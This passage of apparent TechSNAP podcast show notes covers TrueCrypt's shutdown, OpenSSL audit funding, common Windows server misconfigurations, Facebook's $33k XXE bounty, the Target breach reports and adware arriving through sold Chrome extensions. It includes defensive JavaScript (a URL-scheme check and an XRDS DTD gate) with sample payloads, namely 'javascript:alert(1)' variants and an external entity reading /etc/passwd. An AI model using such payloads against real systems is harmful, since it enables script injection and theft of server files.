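  const trimmed = url.replace(/^[\u0000-\u0020\u007f]+|[\u0000-\u0020\u007f]+$/g, "");
  const noInnerCtl = trimmed.replace(/[\t\n\r]/g, "");
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(noInnerCtl);
  return m ? m[1].toLowerCase() : null;
}

function hardenedIsScriptUrl(url) {
  return canonicalScheme(url) === "javascript";
}

// Policy for a navigation requested by another origin: anything whose
// canonical scheme is javascript: must never run in the target's context.
function allowCrossOriginNavigation(url) {
  return !hardenedIsScriptUrl(url);
}

// Constructed inputs: a plain URL, the plain injection, the NUL-prefixed
// variant described in the notes, and a mixed-case one with leading space.
const SAMPLES = ["https://example.com/", "javascript:alert(1)", "\u0000javascript:alert(1)", " JavaScript:alert(1)"];
for (const s of SAMPLES) {
  console.log(JSON.stringify(s), "naive:", naiveIsScriptUrl(s), "hardened:", hardenedIsScriptUrl(s));
}
```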

Tales from the TrueCrypt | TechSNAP 164 https://original.jupiterbroadcasting.net/58542/tales-from-the-truecrypt-techsnap-164/ Thu, 29 May 2014 20:29:34 +0000 https://original.jupiterbroadcasting.net/?p=58542 The TrueCrypt project has shut down, and we’ll run down what we think is the most likely answer to this sudden mystery is. Plus the good news for openSSL, the top 10 Windows configuration mistakes, and big batch of your questions, our answers, and much much more! Thanks to: Direct Download: HD Video | Mobile […]


— Show Notes: —

TrueCrypt shuts down unexpectedly

  • TrueCrypt is a cross-platform image or whole disk encryption system
  • The website for TrueCrypt changed yesterday, stating that “it may contain unfixed security issues”
  • The page states that, now that Windows XP is EOL and all supported versions of Windows support ‘BitLocker’ disk encryption, TrueCrypt is no longer necessary
  • The website provides information about transitioning data from TrueCrypt to the OS disk encryption system for various different OSs
  • The website has been updated with version 7.2 of TrueCrypt, which only allows the user to decrypt their files, not encrypt any new files
  • This was originally thought to be a hack of the site, or a hoax
  • The new binary is signed with the correct key, the same as previous versions of TrueCrypt, suggesting that this post is legitimate
  • While the code is available, the license is restrictive
  • The developers of TrueCrypt are anonymous
  • GIST tracking various bits of information and speculating about possible causes
  • ThreatPost coverage
  • One of the suspicious things about the announcement is the recommendation to use BitLocker; the authors of TrueCrypt had previously expressed concerns about how BitLocker stores the secret keys in the TPM (Trusted Platform Module), which may also allow the NSA to access the secret key
  • There is some speculation that this could be a ‘warrant canary’, the authors’ way of telling the public that they were forced to do something to TrueCrypt, or to divulge something about TrueCrypt
  • However, it is more likely that the developers just no longer have an interest in maintaining TrueCrypt
  • The last major version release was 3 years ago, and the most recent release before the announcement was over a year ago. An actively developed project would likely have had at least some maintenance releases in that time
  • The code for TrueCrypt was being audited after a crowdfunding effort. The first phase of the audit found no obvious backdoors, but the actual cryptography had not been analyzed yet.
  • Additional Coverage – Krebs On Security

Core Infrastructure Initiative provides OpenSSL with 2 full time developers and funds a security audit

  • The CII has announced its Advisory board and the list of projects it is going to support
  • Advisory Board members include:
    • longtime Linux kernel developer and open source advocate Alan Cox
    • Matt Green of Open Crypto Audit Project
    • Dan Meredith of the Radio Free Asia’s Open Technology Fund
    • Eben Moglen of Software Freedom Law Center
    • Bruce Schneier of the Berkman Center for Internet & Society at Harvard Law School
    • Eric Sears of the MacArthur Foundation
    • Ted T’so of Google and the Linux kernel community
  • Projects identified as core infrastructure:
    • Network Time Protocol
    • OpenSSH
    • OpenSSL
    • Open Crypto Audit Project to conduct security audit of OpenSSL
  • The security audit will be difficult due to the lack of a consistent style in the code and the maze of ifdef and ifndef segments
  • The OCAP (Open Crypto Audit Project) team, which includes Johns Hopkins professor and cryptographer Matthew Green and Kenn White, will now have the money to fund an audit of OpenSSL
  • OCAP was originally created by a crowdfunded project to audit TrueCrypt

The top 10 Windows server security misconfigurations

  • NCC Group does what it calls ‘Build Surveys’, where they check production environments to ensure they are configured properly
  • The following is the result of an analysis of their last 50 such surveys:
    • Missing Microsoft Patches: 82%
    • Insufficient Auditing: 50%
    • Third-Party Software Updates: 48%
    • Weak Password Policy: 38%
    • UAC Disabled for Administrator Account: 34%
    • Disabled Host-Based Firewall: 34%
    • Clear Text Passwords and Other Sensitive Information: 24%
    • Account Lockout Disabled: 20%
    • Out-of-Date Virus Definitions: 18%
    • No Antivirus Installed: 12%
  • Conclusions: Everyone makes the same mistakes, over and over
  • Most of these problems are trivial to fix
  • Part of the problem is a culture of ‘patch averseness’. Partly this is the fault of software vendors often issuing patches that break more things than they fix, but in general Microsoft has actually done a good job of ensuring their patches apply smoothly and do not break things
  • Part of this is the fact that they only issue updates once a month, and only once they have been tested
  • In the study, most of the machines that were missing patches were missing patches more than a year old, so it isn’t just conservatism, but a complete lack of proper patch management

Tarnished Chrome | TechSNAP 146 https://original.jupiterbroadcasting.net/50227/tarnished-chrome-techsnap-146/ Thu, 23 Jan 2014 17:34:34 +0000 https://original.jupiterbroadcasting.net/?p=50227 Why Facebook just paid out a $33k bug bounty, and Chrome's bad security week.


Facebook just paid out their biggest bug bounty yet; we’ll tell you about the flaw that was so major it warranted a $33k bounty. Plus it’s been a bad week for Chrome security…

Then it’s a big batch of your questions, our answers, and much much more!


— Show Notes: —

Facebook pays out biggest bug bounty ever, $33,500 after researcher gets ‘keys to the kingdom’

  • Reginaldo Silva, a Brazilian security researcher, found a remote code execution flaw in Facebook and was able to perform various functions, including copying the /etc/passwd file (giving him a list of the users that exist on the system), and could have changed the URL for the Google OpenID provider in order to execute MitM attacks on users logging in to Facebook using their Gmail accounts
  • The original flaw was found in September 2012, when the researcher discovered an XXE (XML External Entity) bug in a Drupal blog’s OpenID provider
  • After finding the flaw in OpenID, he tried the attack successfully against StackExchange
  • Later he also tried it against Google; while it worked, he was not able to read any files or make any network connections. For this he received his first bug bounty: $500 from Google
  • During the original investigation, he could not find a valid Facebook OpenID endpoint
  • Some time later, while investigating the Facebook password reset system, he discovered they still used OpenID for Gmail users to reset their passwords
  • Using the newly discovered endpoint, he still was not able to launch his attack, because Facebook only communicated with Google, and for the attack to work he needed to communicate with his malicious OpenID provider
  • After more reading of the OpenID spec, he found what he was looking for and was able to cause Facebook to contact his server, parse his malicious XML and cause Facebook’s servers to run code of his choosing
  • From this he was able to get a copy of the /etc/passwd from the server
  • Researcher’s Blog Post
  • Facebook Security Team Blog Post
  • Facebook Extends Bug Bounty Program
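A mitigation on the relying-party side, as an added example (not the researcher’s or Facebook’s code): the XML that OpenID discovery fetches from a provider (an XRDS document) never needs a DTD, so a gate run before any XML parser sees the bytes can reject any document that declares one, internal or external, and with it the external-entity trick described above. The prolog tokenizer and the sample documents are constructed for this illustration.

```javascript
// Added example: a pre-parse gate for OpenID discovery (XRDS) documents,
// not code from the write-up or from any OpenID library. XRDS needs no DTD,
// so any DOCTYPE or ENTITY declaration is grounds to refuse the document
// before an XML parser gets the chance to resolve external entities.

// Returns { ok: true } or { ok: false, reason } for a raw XML string.
function checkDiscoveryXml(xml) {
  const s = xml.charCodeAt(0) === 0xfeff ? xml.slice(1) : xml; // drop a UTF-8 BOM
  let i = 0;
  // Walk the prolog: whitespace, the XML declaration, other processing
  // instructions and comments may precede the root element, as may a DOCTYPE.
  while (i < s.length) {
    if (/\s/.test(s[i])) { i++; continue; }
    if (s.startsWith("<?", i)) {            // <?xml ...?> or another PI
      const end = s.indexOf("?>", i);
      if (end < 0) return { ok: false, reason: "unterminated processing instruction" };
      i = end + 2; continue;
    }
    if (s.startsWith("<!--", i)) {          // comment
      const end = s.indexOf("-->", i);
      if (end < 0) return { ok: false, reason: "unterminated comment" };
      i = end + 3; continue;
    }
    if (/^<!DOCTYPE/i.test(s.slice(i, i + 9))) {
      return { ok: false, reason: "DTD not permitted in discovery documents" };
    }
    if (s[i] === "<") break;                // root element reached: prolog is over
    return { ok: false, reason: "unexpected text before root element" };
  }
  // Defence in depth: an ENTITY declaration is only legal inside a DTD, so its
  // presence anywhere in the document is rejected too.
  if (/<!ENTITY/i.test(s)) return { ok: false, reason: "entity declaration present" };
  return { ok: true };
}

// Constructed samples: a minimal XRDS document, and the same kind of document
// with an external-entity DTD prepended (the /etc/passwd read from the notes).
const GOOD_XRDS = `<?xml version="1.0" encoding="UTF-8"?>
<xrds:XRDS xmlns:xrds="xri://$xrds" xmlns="xri://$xrd*($v*2.0)">
  <XRD><Service><Type>http://specs.openid.net/auth/2.0/server</Type>
  <URI>https://idp.example/op</URI></Service></XRD>
</xrds:XRDS>`;
const BAD_XRDS = `<?xml version="1.0"?>
<!DOCTYPE xrds [<!ENTITY file SYSTEM "file:///etc/passwd">]>
<xrds:XRDS xmlns:xrds="xri://$xrds"><XRD>&file;</XRD></xrds:XRDS>`;

console.log(checkDiscoveryXml(GOOD_XRDS)); // { ok: true }
console.log(checkDiscoveryXml(BAD_XRDS));  // { ok: false, reason: 'DTD not permitted ...' }
```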

Security companies remove information about Target breach from the Internet

  • One we had previously covered:
  • “On Dec. 18, a malicious software sample was submitted to ThreatExpert.com, a Symantec-owned service. But the public report the service generated vanished.”
  • However, as is often the case with the internet, someone (Krebs ftw) had a copy of the report and posted it
  • “iSight Partners, a Dallas-based cybersecurity company that is working with the U.S. Secret Service, published a series of questions and answers on its website related to the attacks on point-of-sale devices at U.S retailers. That too vanished on Thursday.”
  • “Intel-owned McAfee redacted on Tuesday a blog post from last week that contained technical detail similar to the ThreatExpert.com report”
  • When queried, a Symantec spokeswoman said “we took the initiative to remove it because we didn’t want the information to compromise the ongoing investigation.”
  • Alex Holden, founder of Hold Security, who worked with Brian Krebs on the Adobe breach, said it was the right move for Symantec to pull the report, as attackers might have been able to use the information to compromise other point-of-sale devices at other retailers
  • “I was surprised that this information was posted on the Internet in the first place,” Holden said. “Besides having a Target machine’s name and its IP address, system structure and drive mapping, it discloses a very vital set of credentials setup specifically for exploitation of the device.”
  • As many as six other U.S. companies are believed to be victims of point-of-sale related attacks, where malware intercepts unencrypted card details. So far, only Target and high-end retailer Neiman Marcus have acknowledged the attacks.

Adware vendors buy Chrome Extensions to send ad- and malware-filled updates

  • While Chrome itself is updated automatically by Google, that update process also includes Chrome’s extensions, which are updated by the extension owners.
  • This means that it’s up to the user to decide if the owner of an extension is trustworthy or not, since you are basically giving them permission to push new code out to your browser whenever they feel like it.
  • Ownership of a Chrome extension can be transferred to another party, and users are never informed when an ownership change happens.
  • Malware and adware vendors have caught wind of this and have started showing up at the doors of extension authors, looking to buy their extensions.
  • Once the deal is done and the ownership of the extension is transferred, the new owners can issue an ad-filled update over Chrome’s update service, which sends the adware out to every user of that extension.
  • A first-hand account of this, which was first spotted by OMGChrome, was given by Amit Agarwal, developer of the “Add to Feedly” extension.
  • One morning, the extension author got an e-mail offering “4 figures” for the sale of his Chrome extension. The extension was only about an hour’s worth of work, so Agarwal agreed to the deal, the money was sent over PayPal, and he transferred ownership of the extension to another Google account.
  • A month later, the new extension owners released their first (and so far only) update, which injected adware on all webpages and started redirecting links.
  • This isn’t a one-time event, either. About a month ago, I had a very simple Chrome extension called “Tweet This Page” suddenly transform into an ad-injecting machine and start hijacking Google searches.
  • Google has stated that Chrome’s extension policy is due to change in June 2014. The new policy will require extensions to serve a single purpose.
  • Chromium Blog: Keeping Chrome Extensions Simple
